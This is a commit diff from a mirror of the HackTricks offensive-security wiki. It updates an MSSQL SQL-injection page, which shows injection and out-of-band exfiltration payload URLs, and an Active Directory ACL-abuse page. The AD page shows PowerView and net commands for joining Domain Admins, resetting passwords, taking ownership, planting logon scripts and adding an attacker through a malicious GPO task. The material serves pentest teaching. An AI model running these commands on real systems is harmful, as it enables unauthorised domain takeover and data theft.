mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 14:10:41 +00:00
GitBook: [#3592] No subject
This commit is contained in:
parent
f9c0ea6c24
commit
bd0b87e02c
7 changed files with 205 additions and 69 deletions
|
@ -161,7 +161,8 @@
|
||||||
* [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
|
* [SeImpersonate from High To System](windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md)
|
||||||
* [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
|
* [Windows C Payloads](windows-hardening/windows-local-privilege-escalation/windows-c-payloads.md)
|
||||||
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
|
* [Active Directory Methodology](windows-hardening/active-directory-methodology/README.md)
|
||||||
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse.md)
|
* [Abusing Active Directory ACLs/ACEs](windows-hardening/active-directory-methodology/acl-persistence-abuse/README.md)
|
||||||
|
* [Shadow Credentials](windows-hardening/active-directory-methodology/acl-persistence-abuse/shadow-credentials.md)
|
||||||
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
|
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
|
||||||
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
|
* [AD CS Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
|
||||||
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
|
* [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
|
||||||
|
|
|
@ -63,6 +63,14 @@ https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_f
|
||||||
|
|
||||||
**Permissions:** Requires **`VIEW SERVER STATE`** permission on the server.
|
**Permissions:** Requires **`VIEW SERVER STATE`** permission on the server.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
|
||||||
|
# Or doing
|
||||||
|
Use master;
|
||||||
|
EXEC sp_helprotect 'fn_xe_file_target_read_file';
|
||||||
|
```
|
||||||
|
|
||||||
### `fn_get_audit_file`
|
### `fn_get_audit_file`
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -73,6 +81,14 @@ https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_aud
|
||||||
|
|
||||||
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
|
||||||
|
# Or doing
|
||||||
|
Use master;
|
||||||
|
EXEC sp_helprotect 'fn_get_audit_file';
|
||||||
|
```
|
||||||
|
|
||||||
### `fn_trace_gettabe`
|
### `fn_trace_gettabe`
|
||||||
|
|
||||||
```
|
```
|
||||||
|
@ -83,6 +99,14 @@ https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2
|
||||||
|
|
||||||
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
**Permissions:** Requires the **`CONTROL SERVER`** permission.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
|
||||||
|
# Or doing
|
||||||
|
Use master;
|
||||||
|
EXEC sp_helprotect 'fn_trace_gettabe';
|
||||||
|
```
|
||||||
|
|
||||||
### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
|
### `xp_dirtree`, `xp_fileexists`, `xp_subdirs` <a href="#limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures" id="limited-ssrf-using-master-xp-dirtree-and-other-file-stored-procedures"></a>
|
||||||
|
|
||||||
The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
|
The most common method to make a network call yosqlu will come across using MSSQL is the usage of the Stored Procedure `xp_dirtree`, which weirdly is undocumented by Microsoft, which caused it to be [documented by other folks on the Internet](https://www.baronsoftware.com/Blog/sql-stored-procedures-get-folder-files/). This method has been used in [multiple examples](https://www.notsosecure.com/oob-exploitation-cheatsheet/) of [Out of Band Data exfiltration](https://gracefulsecurity.com/sql-injection-out-of-band-exploitation/) posts on the Internet.
|
||||||
|
@ -135,7 +159,7 @@ public partial class UserDefinedFunctions
|
||||||
|
|
||||||
In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`)
|
In the installation instructions, run the following before the `CREATE ASSEMBLY` query to add the SHA512 hash of the assembly to the list of trusted assemblies on the server (you can see the list using `select * from sys.trusted_assemblies;`)
|
||||||
|
|
||||||
```
|
```sql
|
||||||
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
|
EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -181,6 +205,11 @@ https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_
|
||||||
|
|
||||||
**Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.
|
**Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.
|
||||||
|
|
||||||
|
```sql
|
||||||
|
# Check if you have it
|
||||||
|
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
|
||||||
|
```
|
||||||
|
|
||||||
## **Little tricks for WAF bypasses**
|
## **Little tricks for WAF bypasses**
|
||||||
|
|
||||||
Non-standard whitespace characters: %C2%85 или %C2%A0:
|
Non-standard whitespace characters: %C2%85 или %C2%A0:
|
||||||
|
|
|
@ -333,8 +333,8 @@ It's possible to gain code execution with **elevated privileges on a remote comp
|
||||||
|
|
||||||
The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
|
The compromised user could have some **interesting privileges over some domain objects** that could let you **move** laterally/**escalate** privileges.
|
||||||
|
|
||||||
{% content-ref url="acl-persistence-abuse.md" %}
|
{% content-ref url="acl-persistence-abuse/" %}
|
||||||
[acl-persistence-abuse.md](acl-persistence-abuse.md)
|
[acl-persistence-abuse](acl-persistence-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Printer Spooler service abuse
|
### Printer Spooler service abuse
|
||||||
|
@ -465,8 +465,8 @@ There is a **local administrator** account inside each **DC**. Having admin priv
|
||||||
|
|
||||||
You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.
|
You could **give** some **special permissions** to a **user** over some specific domain objects that will let the user **escalate privileges in the future**.
|
||||||
|
|
||||||
{% content-ref url="acl-persistence-abuse.md" %}
|
{% content-ref url="acl-persistence-abuse/" %}
|
||||||
[acl-persistence-abuse.md](acl-persistence-abuse.md)
|
[acl-persistence-abuse](acl-persistence-abuse/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Security Descriptors
|
### Security Descriptors
|
||||||
|
|
|
@ -12,8 +12,6 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
**This information was mostly copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
|
|
||||||
|
|
||||||
## Context
|
## Context
|
||||||
|
|
||||||
This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
|
This lab is to abuse weak permissions of Active Directory Discretionary Access Control Lists (DACLs) and Acccess Control Entries (ACEs) that make up DACLs.
|
||||||
|
@ -22,7 +20,7 @@ Active Directory objects such as users and groups are securable objects and DACL
|
||||||
|
|
||||||
An example of ACEs for the "Domain Admins" securable object can be seen here:
|
An example of ACEs for the "Domain Admins" securable object can be seen here:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/1 (1).png>)
|
![](<../../../.gitbook/assets/1 (1).png>)
|
||||||
|
|
||||||
Some of the Active Directory object permissions and types that we as attackers are interested in:
|
Some of the Active Directory object permissions and types that we as attackers are interested in:
|
||||||
|
|
||||||
|
@ -48,7 +46,7 @@ Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.ActiveDirectoryRigh
|
||||||
|
|
||||||
We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account:
|
We can see that indeed our user `spotless` has the `GenericAll` rights, effectively enabling the attacker to take over the account:
|
||||||
|
|
||||||
![](../../.gitbook/assets/2.png)
|
![](../../../.gitbook/assets/2.png)
|
||||||
|
|
||||||
* **Change password**: You could just change the password of that user with
|
* **Change password**: You could just change the password of that user with
|
||||||
|
|
||||||
|
@ -83,7 +81,7 @@ Let's see if `Domain admins` group has any weak permissions. First of, let's get
|
||||||
Get-NetGroup "domain admins" -FullData
|
Get-NetGroup "domain admins" -FullData
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/4.png)
|
![](../../../.gitbook/assets/4.png)
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}
|
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local"}
|
||||||
|
@ -91,7 +89,7 @@ Get-NetGroup "domain admins" -FullData
|
||||||
|
|
||||||
We can see that our attacking user `spotless` has `GenericAll` rights once again:
|
We can see that our attacking user `spotless` has `GenericAll` rights once again:
|
||||||
|
|
||||||
![](../../.gitbook/assets/5.png)
|
![](../../../.gitbook/assets/5.png)
|
||||||
|
|
||||||
Effectively, this allows us to add ourselves (the user `spotless`) to the `Domain Admin` group:
|
Effectively, this allows us to add ourselves (the user `spotless`) to the `Domain Admin` group:
|
||||||
|
|
||||||
|
@ -99,7 +97,7 @@ Effectively, this allows us to add ourselves (the user `spotless`) to the `Domai
|
||||||
net group "domain admins" spotless /add /domain
|
net group "domain admins" spotless /add /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/6.gif)
|
![](../../../.gitbook/assets/6.gif)
|
||||||
|
|
||||||
Same could be achieved with Active Directory or PowerSploit module:
|
Same could be achieved with Active Directory or PowerSploit module:
|
||||||
|
|
||||||
|
@ -111,16 +109,21 @@ Add-ADGroupMember -Identity "domain admins" -Members spotless
|
||||||
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
|
Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"
|
||||||
```
|
```
|
||||||
|
|
||||||
## GenericAll / GenericWrite / Write on Computer
|
## GenericAll / GenericWrite / Write on Computer/User
|
||||||
|
|
||||||
* If you have these privileges on a Computer object, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](resource-based-constrained-delegation.md) off.
|
* If you have these privileges on a **Computer object**, you can pull [Kerberos **Resource-based Constrained Delegation**: Computer Object Take Over](../resource-based-constrained-delegation.md) off.
|
||||||
* If you have these privs over a user, you
|
* If you have these privs over a user, you can use one of the [first methods explained in this page](./#genericall-on-user).
|
||||||
|
* Or, either you have it in a Computer or a user you can use **Shadow Credentials** to impersonate it:
|
||||||
|
|
||||||
|
{% content-ref url="shadow-credentials.md" %}
|
||||||
|
[shadow-credentials.md](shadow-credentials.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## WriteProperty on Group
|
## WriteProperty on Group
|
||||||
|
|
||||||
If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group:
|
If our controlled user has `WriteProperty` right on `All` objects for `Domain Admin` group:
|
||||||
|
|
||||||
![](../../.gitbook/assets/7.png)
|
![](../../../.gitbook/assets/7.png)
|
||||||
|
|
||||||
We can again add ourselves to the `Domain Admins` group and escalate privileges:
|
We can again add ourselves to the `Domain Admins` group and escalate privileges:
|
||||||
|
|
||||||
|
@ -128,19 +131,19 @@ We can again add ourselves to the `Domain Admins` group and escalate privileges:
|
||||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/8.png)
|
![](../../../.gitbook/assets/8.png)
|
||||||
|
|
||||||
## Self (Self-Membership) on Group
|
## Self (Self-Membership) on Group
|
||||||
|
|
||||||
Another privilege that enables the attacker adding themselves to a group:
|
Another privilege that enables the attacker adding themselves to a group:
|
||||||
|
|
||||||
![](../../.gitbook/assets/9.png)
|
![](../../../.gitbook/assets/9.png)
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/10.png)
|
![](../../../.gitbook/assets/10.png)
|
||||||
|
|
||||||
## WriteProperty (Self-Membership)
|
## WriteProperty (Self-Membership)
|
||||||
|
|
||||||
|
@ -150,13 +153,13 @@ One more privilege that enables the attacker adding themselves to a group:
|
||||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/11.png)
|
![](../../../.gitbook/assets/11.png)
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
net group "domain admins" spotless /add /domain
|
net group "domain admins" spotless /add /domain
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/12.png)
|
![](../../../.gitbook/assets/12.png)
|
||||||
|
|
||||||
## **ForceChangePassword**
|
## **ForceChangePassword**
|
||||||
|
|
||||||
|
@ -166,7 +169,7 @@ If we have `ExtendedRight` on `User-Force-Change-Password` object type, we can r
|
||||||
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -SamAccountName delegate -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/13.png)
|
![](../../../.gitbook/assets/13.png)
|
||||||
|
|
||||||
Doing the same with powerview:
|
Doing the same with powerview:
|
||||||
|
|
||||||
|
@ -174,7 +177,7 @@ Doing the same with powerview:
|
||||||
Set-DomainUserPassword -Identity delegate -Verbose
|
Set-DomainUserPassword -Identity delegate -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/14.png)
|
![](../../../.gitbook/assets/14.png)
|
||||||
|
|
||||||
Another method that does not require fiddling with password-secure-string conversion:
|
Another method that does not require fiddling with password-secure-string conversion:
|
||||||
|
|
||||||
|
@ -183,7 +186,7 @@ $c = Get-Credential
|
||||||
Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
|
Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/15.png)
|
![](../../../.gitbook/assets/15.png)
|
||||||
|
|
||||||
...or a one liner if no interactive session is not available:
|
...or a one liner if no interactive session is not available:
|
||||||
|
|
||||||
|
@ -191,7 +194,7 @@ Set-DomainUserPassword -Identity delegate -AccountPassword $c.Password -Verbose
|
||||||
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
|
Set-DomainUserPassword -Identity delegate -AccountPassword (ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/16.png)
|
![](../../../.gitbook/assets/16.png)
|
||||||
|
|
||||||
and one last way yo achieve this from linux:
|
and one last way yo achieve this from linux:
|
||||||
|
|
||||||
|
@ -210,7 +213,7 @@ More info:
|
||||||
|
|
||||||
Note how before the attack the owner of `Domain Admins` is `Domain Admins`:
|
Note how before the attack the owner of `Domain Admins` is `Domain Admins`:
|
||||||
|
|
||||||
![](../../.gitbook/assets/17.png)
|
![](../../../.gitbook/assets/17.png)
|
||||||
|
|
||||||
After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All`
|
After the ACE enumeration, if we find that a user in our control has `WriteOwner` rights on `ObjectType:All`
|
||||||
|
|
||||||
|
@ -218,7 +221,7 @@ After the ACE enumeration, if we find that a user in our control has `WriteOwner
|
||||||
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -ResolveGUIDs | ? {$_.objectdn -eq "CN=Domain Admins,CN=Users,DC=offense,DC=local" -and $_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/18.png)
|
![](../../../.gitbook/assets/18.png)
|
||||||
|
|
||||||
...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group:
|
...we can change the `Domain Admins` object's owner to our user, which in our case is `spotless`. Note that the SID specified with `-Identity` is the SID of the `Domain Admins` group:
|
||||||
|
|
||||||
|
@ -228,7 +231,7 @@ Set-DomainObjectOwner -Identity S-1-5-21-2552734371-813931464-1050690807-512 -Ow
|
||||||
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/19.png)
|
![](../../../.gitbook/assets/19.png)
|
||||||
|
|
||||||
## GenericWrite on User
|
## GenericWrite on User
|
||||||
|
|
||||||
|
@ -236,7 +239,7 @@ Set-DomainObjectOwner -Identity Herman -OwnerIdentity nico
|
||||||
Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-ObjectAcl -ResolveGUIDs -SamAccountName delegate | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/20.png)
|
![](../../../.gitbook/assets/20.png)
|
||||||
|
|
||||||
`WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
|
`WriteProperty` on an `ObjectType`, which in this particular case is `Script-Path`, allows the attacker to overwrite the logon script path of the `delegate` user, which means that the next time, when the user `delegate` logs on, their system will execute our malicious script:
|
||||||
|
|
||||||
|
@ -246,7 +249,7 @@ Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\
|
||||||
|
|
||||||
Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:
|
Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:
|
||||||
|
|
||||||
![](../../.gitbook/assets/21.png)
|
![](../../../.gitbook/assets/21.png)
|
||||||
|
|
||||||
## GenericWrite on Group
|
## GenericWrite on Group
|
||||||
|
|
||||||
|
@ -268,7 +271,7 @@ Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'use
|
||||||
|
|
||||||
If you are the owner of a group, like I'm the owner of a `Test` AD group:
|
If you are the owner of a group, like I'm the owner of a `Test` AD group:
|
||||||
|
|
||||||
![](../../.gitbook/assets/22.png)
|
![](../../../.gitbook/assets/22.png)
|
||||||
|
|
||||||
Which you can of course do through powershell:
|
Which you can of course do through powershell:
|
||||||
|
|
||||||
|
@ -276,13 +279,13 @@ Which you can of course do through powershell:
|
||||||
([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
|
([ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local").PSBase.get_ObjectSecurity().GetOwner([System.Security.Principal.NTAccount]).Value
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/23.png)
|
![](../../../.gitbook/assets/23.png)
|
||||||
|
|
||||||
And you have a `WriteDACL` on that AD object:
|
And you have a `WriteDACL` on that AD object:
|
||||||
|
|
||||||
![](../../.gitbook/assets/24.png)
|
![](../../../.gitbook/assets/24.png)
|
||||||
|
|
||||||
...you can give yourself [`GenericAll`](../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery:
|
...you can give yourself [`GenericAll`](../../../windows/active-directory-methodology/broken-reference/) privileges with a sprinkle of ADSI sorcery:
|
||||||
|
|
||||||
```csharp
|
```csharp
|
||||||
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
|
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
|
||||||
|
@ -294,7 +297,7 @@ $ADSI.psbase.commitchanges()
|
||||||
|
|
||||||
Which means you now fully control the AD object:
|
Which means you now fully control the AD object:
|
||||||
|
|
||||||
![](../../.gitbook/assets/25.png)
|
![](../../../.gitbook/assets/25.png)
|
||||||
|
|
||||||
This effectively means that you can now add new users to the group.
|
This effectively means that you can now add new users to the group.
|
||||||
|
|
||||||
|
@ -308,18 +311,18 @@ $acl.AddAccessRule($ace)
|
||||||
Set-Acl -Path $path -AclObject $acl
|
Set-Acl -Path $path -AclObject $acl
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/26.png)
|
![](../../../.gitbook/assets/26.png)
|
||||||
|
|
||||||
## **Replication on the domain (DCSync)**
|
## **Replication on the domain (DCSync)**
|
||||||
|
|
||||||
The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\
|
The **DCSync** permission implies having these permissions over the domain itself: **DS-Replication-Get-Changes**, **Replicating Directory Changes All** and **Replicating Directory Changes In Filtered Set**.\
|
||||||
[**Learn more about the DCSync attack here.**](dcsync.md)
|
[**Learn more about the DCSync attack here.**](../dcsync.md)
|
||||||
|
|
||||||
## GPO Delegation <a href="#gpo-delegation" id="gpo-delegation"></a>
|
## GPO Delegation <a href="#gpo-delegation" id="gpo-delegation"></a>
|
||||||
|
|
||||||
Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user:
|
Sometimes, certain users/groups may be delegated access to manage Group Policy Objects as is the case with `offense\spotless` user:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a13.png)
|
![](../../../.gitbook/assets/a13.png)
|
||||||
|
|
||||||
We can see this by leveraging PowerView like so:
|
We can see this by leveraging PowerView like so:
|
||||||
|
|
||||||
|
@ -329,13 +332,13 @@ Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
|
|
||||||
The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse:
|
The below indicates that the user `offense\spotless` has **WriteProperty**, **WriteDacl**, **WriteOwner** privileges among a couple of others that are ripe for abuse:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a14.png)
|
![](../../../.gitbook/assets/a14.png)
|
||||||
|
|
||||||
### Enumerate GPO Permissions <a href="#abusing-the-gpo-permissions" id="abusing-the-gpo-permissions"></a>
|
### Enumerate GPO Permissions <a href="#abusing-the-gpo-permissions" id="abusing-the-gpo-permissions"></a>
|
||||||
|
|
||||||
We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below:
|
We know the above ObjectDN from the above screenshot is referring to the `New Group Policy Object` GPO since the ObjectDN points to `CN=Policies` and also the `CN={DDC640FF-634A-4442-BC2E-C05EED132F0C}` which is the same in the GPO settings as highlighted below:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a15.png)
|
![](../../../.gitbook/assets/a15.png)
|
||||||
|
|
||||||
If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so:
|
If we want to search for misconfigured GPOs specifically, we can chain multiple cmdlets from PowerSploit like so:
|
||||||
|
|
||||||
|
@ -343,7 +346,7 @@ If we want to search for misconfigured GPOs specifically, we can chain multiple
|
||||||
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/a16.png)
|
![](../../../.gitbook/assets/a16.png)
|
||||||
|
|
||||||
**Computers with a Given Policy Applied**
|
**Computers with a Given Policy Applied**
|
||||||
|
|
||||||
|
@ -353,7 +356,7 @@ We can now resolve the computer names the GPO `Misconfigured Policy` is applied
|
||||||
Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}
|
Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/a17.png)
|
![](../../../.gitbook/assets/a17.png)
|
||||||
|
|
||||||
**Policies Applied to a Given Computer**
|
**Policies Applied to a Given Computer**
|
||||||
|
|
||||||
|
@ -379,11 +382,11 @@ One of the ways to abuse this misconfiguration and get code execution is to crea
|
||||||
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
|
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/a19.png)
|
![](../../../.gitbook/assets/a19.png)
|
||||||
|
|
||||||
The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`:
|
The above will add our user spotless to the local `administrators` group of the compromised box. Note how prior to the code execution the group does not contain user `spotless`:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a20.png)
|
![](../../../.gitbook/assets/a20.png)
|
||||||
|
|
||||||
### GroupPolicy module **- Abuse GPO**
|
### GroupPolicy module **- Abuse GPO**
|
||||||
|
|
||||||
|
@ -420,7 +423,7 @@ if you have access to the computer you can force it with `gpupdate /force` .
|
||||||
|
|
||||||
If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there:
|
If we observe the Scheduled Tasks of the `Misconfigured Policy` GPO, we can see our `evilTask` sitting there:
|
||||||
|
|
||||||
![](../../.gitbook/assets/a22.png)
|
![](../../../.gitbook/assets/a22.png)
|
||||||
|
|
||||||
Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO:
|
Below is the XML file that got created by `New-GPOImmediateTask` that represents our evil scheduled task in the GPO:
|
||||||
|
|
||||||
|
@ -508,6 +511,7 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
* Initially, this information was mostly copied from [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) 
|
||||||
* [https://wald0.com/?p=112](https://wald0.com/?p=112)
|
* [https://wald0.com/?p=112](https://wald0.com/?p=112)
|
||||||
